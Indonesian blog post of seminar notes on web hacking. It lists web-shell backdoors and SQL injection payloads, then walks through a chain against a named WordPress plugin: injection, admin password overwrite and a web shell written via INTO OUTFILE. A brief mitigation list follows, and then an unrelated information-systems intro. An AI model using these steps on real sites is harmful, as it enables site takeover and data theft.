Minggu, 03 Maret 2013

Seminar X-CODE

Teka-Teki Report Password
Web Hacking X-Code 2 Maret 2013
UIN Maulana Malik Ibrahim Malang

Pengenalan Hacking

Konsep dasar ethical hacker?
Pemahaman dasar ethical hacker
Keamanan komputer menjadi penting?

Perkembangan komputer
Ketergantungan manusia
Tuntutan kompleksitas semakin tinggi
Keamanan menjadi anak tiri
Kemampuan orang disebut hacker menjadi menurun
Kemampuan rendah bisa menjadi ancaman tinggi untuk kepentingan umum

Terminologi hacker
Contoh Situs yang menyediakan exploits
Metasploit Frameworks
Exploit-db.com
securityfocus.com
Darkc0de.com
packetstormsecurity.org



Element-element keamanan (CIA)
u  Confidentiality
                Keamanan informasi data untuk diketahui atau dibaca oleh pihak yang tidak dikehendaki
u  Integrity / integritas
                Keamanan informasi data untuk menghindari adanya perubahan yang tidak dikehendaki
u  Availability
                Keamanan informasi data untuk ketersediaan atau keberadaannya
Triangle Keamanan

Pengelompokkan hacker

  •   Black Hat Hacker
  •   White Hat Hacker
  •   Grey Hat Hacker
  •   Suicide Hacker

Tahapan aktifitas Hacking

  1. Reconnaissance
  2.       Scanning
  3. Gaining Acces 
  4.   Maintaining acces
  5. Covering Tracks

Reconnaissance
Reconnaissance Passive
u  Pencarian data target di google
u  Pencarian data target di berbagai jejaring sosial Reconnaissance Active
u  HTTP Fingerprint 

Pencarian exploit berdasarkan scanningGoogle.com
Archive Milw0rm
Archive Exploit DB
Metasploit Framework
Darkc0de


Gaining Acces
Exploitasi Remote Execution pada celah keamanan OS
Exploitasi Remote Execution pada celah keamanan aplikasi
Exploitasi Remote Execution pada celah keamanan web

Maintaining Acces
PHP Backdoor
Simple php shell
R57
C99 / C100
ASP Backdoor
B374K


Covering tracks
Pembersihan berbagai exploit atau software yang diupload
Pembersihan jejak disesuaikan dengan penggunaan aplikasi di target dan ke target.
 
GET dan POSTGET :
www.site.com/form.php?nama=zae
POST : www.site.com/form.php

IMPLEMENTASI pada method GET & POST
Langsung dari URL
http://localhost/ict2013/materi/nilai_GET.html

Header : Content-Type: application/x-www-form-urlencoded
Data : variable=value
http://localhost/ict2013/materi/nilai_POST.html

Query

$query = “SELECT * FROM contoh WHERE nama =’$username’”;

$username = dari GET atau POST

SQL Injection
query = “SELECT namaTabel FROM contoh WHERE nama =’$username’”; DROP TABLE namaTabel; --’

$query = “SELECT namaTabel FROM contoh WHERE nama =‘terserah‘ OR ‘x’ = ‘x’”;
Vulnerability Info
Description : Wordpress Plugins - Google Maps via Store Locator Plus Multiple Vulnerability
Version : 2.7.1 - 3.0.1
Link : http://wordpress.org/extend/plugins/store-locator-le/
Plugins : http://downloads.wordpress.org/plugin/store-locator-le.3.0.1.zip
Date : 26-05-2012
Google Dork : inurl:/wp-content/plugins/store-locator-le/
Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
http://www.exemple.com/wordpress/wp-content/plugins/store-locator-le/downloadcsv.php

SQL Injection Vuln
 
 POST Method, Advanced REST Client
URL : http://localhost/demo/wp-content/plugins/store-locator-le/downloadcsv.php
Method : POST
Header : Content-Type: application/x-www-form-urlencoded
Data : query=[injection]

Contoh:
query=SELECT * FROM wp_users


Mengatasi Teka-Teki Hash
UPDATE – replace password
UPDATE  wp_users SET  user_pass =  '$P$BAu2rgOUahu8hibdJ12ToW4zu6b.XB.' WHERE  `wp_users`.`ID` =1 LIMIT 1 ;
Mengganti password menjadi “password"

Upload b374k via Query
SELECT ’[kode script]’ INTO OUTFILE “e:/AppServ/www/ict2013/exploit.php”
http://localhost/ict2013/wp-content/plugins/store-locator-le/core/load_wp_config.php
+ diganti %2B

Base 64 Encryption

Base64 adalah istilah umum untuk sejumlah skema pengkodean serupa yang mengkodekan data biner dan menerjemahkannya ke dalam representasi basis 64. Istilah Base64 berasal dari konten pengkodean MIME tertentu. (Wikipedia, 2010)

PENGAMANAN

  1.  Update CMS, plugin
  2. Menggunakan mysql_real_escape_string()
  3. Memberikan validasi pada tiap inputan
  4. Berikan length limit pada inputan
  5. Config database error report
  6. Setting php.ini
  7. dll




Rabu, 20 Februari 2013

Pendahuluan SI



SISTEM INFORMASI
Konsep Dasar Sistem
Sistem : kumpulan dari elemen-elemen yang berinteraksi untuk mencapai suatu tujuantertentu.
Menurut Jerry FithGerald ; sistem adalah suatu jaringan kerja dari prosedur-prosedur yang saling berhubungan, berkumpul bersama-sama untuk melakukan suatu kegiatan atau menyelesaikan suatu sasaran tertentu.
Informatika : Mengolah data dan mengubah jadi Informasi. Diolah, diatur dan diproses untuk mencapi tujuan tertentu.
komponen nya :
- input
- proses
- output
 ada 5 cabang. Yaitu :
- IS
- IT
- CE
- CS
- SE